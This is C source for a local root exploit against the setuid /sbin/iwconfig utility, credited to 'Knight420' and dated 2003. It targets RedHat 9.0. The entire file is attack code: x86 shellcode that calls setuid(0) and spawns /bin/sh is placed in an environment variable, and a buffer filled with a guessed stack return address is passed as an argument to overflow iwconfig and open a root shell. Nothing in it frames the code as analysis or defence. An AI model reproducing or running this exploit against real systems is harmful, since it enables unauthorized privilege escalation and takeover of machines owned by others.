/* * ================================================== * chemtrailX.c /sbin/iwconfig local exploit * By: Knight420 * 11/13/03 * * Tested against: RedHat 9.0 * * Gr33tz to: heka, realist * * (C) COPYRIGHT Blue Ballz , 2003 * all rights reserved * ================================================= */ #include #define STACK_START 0xC0000000 char shellcode[] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\xeb\x1d" "\x5e\x88\x46\x07\x89\x46\x0c\x89\x76\x08\x89\xf3" "\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xc0" "\x31\xdb\x40\xcd\x80\xe8\xde\xff\xff\xff/bin/sh"; int main(int argc, char *argv[]) { char buff[5000]; char buff2[5000]; int *ptr; int ret; char *arg[] = { "iwconfig",buff,NULL } ; char *env[] = { buff2, NULL }; if(argc < 2) { printf("Usage: %s \n",argv[0]); exit(0); } ret = STACK_START - atoi(argv[1]); for(ptr = (int*)&buff[0]; ptr < (int*)&buff[5000]; ptr++) *ptr = ret; buff[sizeof(buff)-1] = 0; snprintf(buff2,sizeof(buff2),"SHELL=%s",shellcode); printf ("iwconfig Local Exploit by: Knight420\n"); printf ("Return Addr: %p\n",ret); printf ("Spawning sh3ll\n"); execve("/sbin/iwconfig",arg,env); }